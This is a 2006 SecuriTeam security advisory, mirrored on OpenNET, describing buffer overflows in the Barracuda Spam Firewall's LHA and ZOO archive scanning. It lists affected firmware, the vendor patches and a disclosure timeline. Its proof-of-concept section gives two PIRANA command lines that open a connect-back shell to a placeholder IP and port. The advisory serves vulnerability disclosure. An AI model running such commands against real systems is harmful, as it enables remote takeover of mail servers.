The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Barracuda Spam Firewall Archiver Vulnerabilities


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 4 Apr 2006 10:54:16 +0200
Subject: [UNIX] Barracuda Spam Firewall Archiver Vulnerabilities
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060404105313.12FB757A5@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Barracuda Spam Firewall Archiver Vulnerabilities
------------------------------------------------------------------------


SUMMARY

"The  <http://www.barracudanetworks.com/>; Barracuda Spam Firewall is an 
integrated hardware and software solution for complete protection of your 
email server. It provides a powerful, easy to use, and affordable solution 
to eliminating spam and virus from your organization."

Barracuda spam firewall is vulnerable to buffer overflows when it scans 
maliciously crafted LHA or ZOO archives.

DETAILS

Vulnerable Systems:
 * Barracuda Spam Firewall with firmware versions prior to 3.3.03.022
 * Barracuda Spam Firewall with spamdef version prior to 3.0.10045

When building a special LHA or ZOO archive with long filenames in it, it 
is possible to overflow a buffer on the stack used by the program and 
seize control of the program. Since this component is used when scanning 
an incoming email, remote compromise is possible by sending a simple email 
with the specially crafted archive attached to the Barracuda Spam 
Firewall. No administration access (on port 8000) needed for successfull 
exploitation.

Proof of concept:
Using the PIRANA framework, available at  <http://www.guay-leroux.com>; 
http://www.guay-leroux.com, it is possible to test the Barracuda Spam 
Firewall against the LHA or ZOO vulnerability.

By calling PIRANA the way it is described below, you will get a TCP 
connect back shell on IP address 1.2.3.4 and port 1234:

LHA:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 
1.2.3.4 \ -p 1234 -z -c 1 -d 1

ZOO:
perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 
1.2.3.4 \ -p 1234 -z -c 1 -d 1

Vendor Status:
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388, 
available March 3rd 2006.
They also published an official patch in firmware #3.3.03.022, available 
April 3rd 2006.
It is recommended to update to firmware #3.3.03.022 .

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0855>; 
CVE-2006-0855

OSVDB References:
#5753, #5754, #23460

Disclosure Timeline:
 * 2006-03-02 - Disclosure of vulnerability to Barracuda Networks
 * 2006-03-02 - Acknowledgement of the problem
 * 2006-03-03 - ZOO Problem fixed
 * 2006-03-24 - LHA Problem fixed
 * 2006-04-03 - Advisory disclosed to public


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:jean-sebastien@guay-leroux.com.> Jean-Sebastien Guay-Leroux.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру